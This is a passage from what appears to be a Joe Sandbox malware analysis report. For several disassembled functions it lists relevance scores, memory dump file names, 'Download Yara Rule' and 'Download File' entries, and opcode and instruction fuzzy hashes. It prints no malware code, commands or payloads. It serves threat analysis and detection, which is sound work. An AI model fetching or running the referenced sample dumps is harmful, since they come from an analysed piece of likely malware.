                                                                                                                                                • Opcode Fuzzy Hash: efb29da7d79096bacc6094e4b34e266ec592ef3032653cf8f6be9c20689d955e
                                                                                                                                                • Instruction Fuzzy Hash: BC522A316087118BC725DF1CD8402BAFBE1FFD5319F298A2DD9C697291EB34A851CB86
                                                                                                                                                Function 0056A300 Relevance: .5, Instructions: 459COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.2248189288.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.2248162687.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248236350.00000000005C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248256616.00000000005CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248407211.0000000000724000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248425898.0000000000726000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248446165.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248466420.000000000073B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248484421.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248484421.0000000000745000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248530529.0000000000749000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248549683.000000000074B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248574811.000000000075E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248595402.000000000075F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248617778.0000000000762000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248634549.0000000000763000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248659798.0000000000773000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248678110.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248695577.0000000000775000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248713489.0000000000776000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248735979.000000000077E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248756195.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248773348.0000000000788000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248790104.0000000000789000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248814586.000000000079E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248833289.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248856584.00000000007A0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248875471.00000000007A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248892861.00000000007A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248927737.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248965509.00000000007B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248997672.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249017938.00000000007B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249035947.00000000007BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249054287.00000000007C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249071697.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249089577.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249107541.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249131346.00000000007E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249149981.00000000007E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249169817.00000000007F3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249188404.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249188404.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249239425.0000000000847000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249259015.0000000000848000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249276510.0000000000849000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249276510.0000000000853000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249317293.0000000000860000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249337477.0000000000861000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_560000_file.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 6212bf7ef53d90d5c52b7f9dca0e1cd9d1bc5b4f631ca8a0588aaa50f1e087ad
                                                                                                                                                • Instruction ID: 4e76562ea4cc1e6109a737d4ca06151d05d17ec1eacac5f272454923b68aec7b
                                                                                                                                                • Opcode Fuzzy Hash: 6212bf7ef53d90d5c52b7f9dca0e1cd9d1bc5b4f631ca8a0588aaa50f1e087ad
                                                                                                                                                • Instruction Fuzzy Hash: 47F19B766087418FC724CF29C88166BBFE2BFD8304F08882DE4D587752E639E945CB92
                                                                                                                                                Function 0056AF10 Relevance: .3, Instructions: 303COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.2248189288.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.2248162687.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248236350.00000000005C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248256616.00000000005CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248407211.0000000000724000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248425898.0000000000726000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248446165.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248466420.000000000073B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248484421.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248484421.0000000000745000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248530529.0000000000749000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248549683.000000000074B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248574811.000000000075E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248595402.000000000075F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248617778.0000000000762000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248634549.0000000000763000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248659798.0000000000773000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248678110.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248695577.0000000000775000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248713489.0000000000776000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248735979.000000000077E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248756195.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248773348.0000000000788000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248790104.0000000000789000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248814586.000000000079E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248833289.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248856584.00000000007A0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248875471.00000000007A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248892861.00000000007A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248927737.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248965509.00000000007B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248997672.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249017938.00000000007B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249035947.00000000007BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249054287.00000000007C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249071697.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249089577.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249107541.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249131346.00000000007E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249149981.00000000007E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249169817.00000000007F3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249188404.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249188404.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249239425.0000000000847000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249259015.0000000000848000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249276510.0000000000849000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249276510.0000000000853000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249317293.0000000000860000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249337477.0000000000861000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_560000_file.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: ab0ffa581ae49f987acb9b1bca04b9a9e378426b89f686002d56ea1de386bdc0
                                                                                                                                                • Instruction ID: 68b1466344b3d12fc0656f5bf540869c842719380a8a62ba4b013591cad3b7bd
                                                                                                                                                • Opcode Fuzzy Hash: ab0ffa581ae49f987acb9b1bca04b9a9e378426b89f686002d56ea1de386bdc0
                                                                                                                                                • Instruction Fuzzy Hash: 02C15CB2A087418FD360CF68DC967ABBBE1BF85318F08492DD1D9C7242E778A155CB46
                                                                                                                                                Function 00576536 Relevance: .3, Instructions: 295COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.2248189288.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.2248162687.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248236350.00000000005C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248256616.00000000005CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248407211.0000000000724000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248425898.0000000000726000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248446165.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248466420.000000000073B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248484421.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248484421.0000000000745000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248530529.0000000000749000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248549683.000000000074B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248574811.000000000075E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248595402.000000000075F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248617778.0000000000762000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248634549.0000000000763000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248659798.0000000000773000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248678110.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248695577.0000000000775000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248713489.0000000000776000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248735979.000000000077E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248756195.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248773348.0000000000788000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248790104.0000000000789000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248814586.000000000079E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248833289.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248856584.00000000007A0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248875471.00000000007A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248892861.00000000007A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248927737.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248965509.00000000007B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248997672.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249017938.00000000007B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249035947.00000000007BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249054287.00000000007C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249071697.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249089577.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249107541.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249131346.00000000007E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249149981.00000000007E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249169817.00000000007F3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249188404.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249188404.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249239425.0000000000847000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249259015.0000000000848000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249276510.0000000000849000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249276510.0000000000853000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249317293.0000000000860000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249337477.0000000000861000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_560000_file.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 355b7deec0619b4e5a081c40f64866657bd8f5f167f91b168a2066fd86ee7659
                                                                                                                                                • Instruction ID: c6f694472b76157b1343ab2f42e206eb842364183a8926ad95d53f3dfae2d3b9
                                                                                                                                                • Opcode Fuzzy Hash: 355b7deec0619b4e5a081c40f64866657bd8f5f167f91b168a2066fd86ee7659
                                                                                                                                                • Instruction Fuzzy Hash: 2FB1FEB4600B408FD3258F24D985B67BBF2FF46704F54885CE8AA8BA52E736F805CB55
                                                                                                                                                Function 005AA0D0 Relevance: .3, Instructions: 282COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.2248189288.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.2248162687.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248236350.00000000005C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248256616.00000000005CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248407211.0000000000724000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248425898.0000000000726000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248446165.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248466420.000000000073B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248484421.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248484421.0000000000745000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248530529.0000000000749000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248549683.000000000074B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248574811.000000000075E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248595402.000000000075F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248617778.0000000000762000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248634549.0000000000763000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248659798.0000000000773000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248678110.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248695577.0000000000775000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248713489.0000000000776000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248735979.000000000077E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248756195.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248773348.0000000000788000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248790104.0000000000789000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248814586.000000000079E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248833289.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248856584.00000000007A0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248875471.00000000007A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248892861.00000000007A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248927737.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248965509.00000000007B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248997672.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249017938.00000000007B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249035947.00000000007BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249054287.00000000007C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249071697.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249089577.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249107541.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249131346.00000000007E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249149981.00000000007E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249169817.00000000007F3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249188404.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249188404.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249239425.0000000000847000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249259015.0000000000848000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249276510.0000000000849000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249276510.0000000000853000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249317293.0000000000860000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249337477.0000000000861000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_560000_file.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 0439e72aa25ef32543a17ff04a21772dc5ec1a6aaabd139558dda8189586fafb
                                                                                                                                                • Instruction ID: eef95d6987ea8c43bfc37100c28b3d1cdb42f99a6f24852685a84a5f13f09bea
                                                                                                                                                • Opcode Fuzzy Hash: 0439e72aa25ef32543a17ff04a21772dc5ec1a6aaabd139558dda8189586fafb
                                                                                                                                                • Instruction Fuzzy Hash: 73817C342087019BDB25DF28D890A2EBBE5FF9A740F55892DE5868B251E731EC14CB92
                                                                                                                                                Function 005742FC Relevance: .2, Instructions: 206COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.2248189288.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.2248162687.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248236350.00000000005C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248256616.00000000005CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248407211.0000000000724000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248425898.0000000000726000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248446165.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248466420.000000000073B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248484421.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248484421.0000000000745000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248530529.0000000000749000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248549683.000000000074B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248574811.000000000075E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248595402.000000000075F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248617778.0000000000762000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248634549.0000000000763000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248659798.0000000000773000.00000080.00000001.01000000.00000003.sdmpDownload File
